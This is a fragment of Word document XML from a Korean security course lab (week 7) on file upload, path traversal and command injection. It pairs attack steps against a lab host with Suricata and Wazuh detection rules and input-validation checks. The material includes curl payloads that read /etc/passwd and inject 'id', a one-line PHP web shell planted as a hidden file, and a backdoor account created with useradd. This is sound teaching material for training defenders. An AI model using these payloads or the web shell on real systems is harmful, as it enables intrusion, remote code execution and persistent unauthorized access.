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W7] 파일 업로드/경로순회/명령주입 — RCE 발판 vs 입력검증 방어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7주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>파일 업로드 / 경로 순회 / 명령어 주입</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 셋 다 RCE 로 이어지는 고위험 취약점이다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>공격자는 웹쉘 업로드·트래버설·명령주입으로 발판을 얻고, 점검자(너)는 입력 검증·탐지로 방어한다.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웹쉘을 업로드하고(태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wv07r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) 웹쉘(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.wv07shell.php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wva07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업로드/트래버설 탐지, ② 웹쉘 Wazuh 룰, ③ 입력검증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태그/웹쉘·계정).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`wv07r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/www/html/.wv07shell.php`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wv07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`wva07`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9907011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105071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[업로드/트래버설/명령주입] — RCE 시도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mediforum.6v6.lab" "http://192.168.0.161/api/debug/echo?file=wv07r1-kim/../../../../etc/passwd"</w:t>
        <w:br/>
        <w:t>curl -s -H "Host: mediforum.6v6.lab" "http://192.168.0.161/api/debug/echo?ip=127.0.0.1;id%23wv07r1-kim&amp;Submit=Submit"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wv07r1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[웹쉘 업로드] — PHP 웹쉘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cat &gt; /var/www/html/.wv07shell.php &lt;&lt;'PHP'</w:t>
        <w:br/>
        <w:t>&lt;?php /* wv07 */ system($_POST['c'] ?? ''); ?&gt;</w:t>
        <w:br/>
        <w:t>PHP</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash wva07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/var/www/html/.wv07shell.php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wv07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wva07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[트래버설/명령주입 탐지] — Suricata 룰 (sid 9907011)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(msg:"WEBVULN-W07 path traversal / command injection"; flow:to_server; http.uri; content:"../"; nocase; sid:9907011;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9907011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[웹쉘 탐지] — Wazuh 룰 (id 105071)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id="105071" level="13"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;wva07&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;WEBVULN-W07 - web shell upload / RCE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r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">또한 웹쉘 헌팅: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>find /var/www -name '.*.php' -mmin -120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105071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[입력검증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업로드 검증(확장자/MIME/매직바이트/저장 위치 분리) + 트래버설 방어(정규화/화이트리스트) + 명령주입 방어(인자 분리) 점검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웹쉘(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.wv07shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·계정(wva07) 헌팅·삭제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입력검증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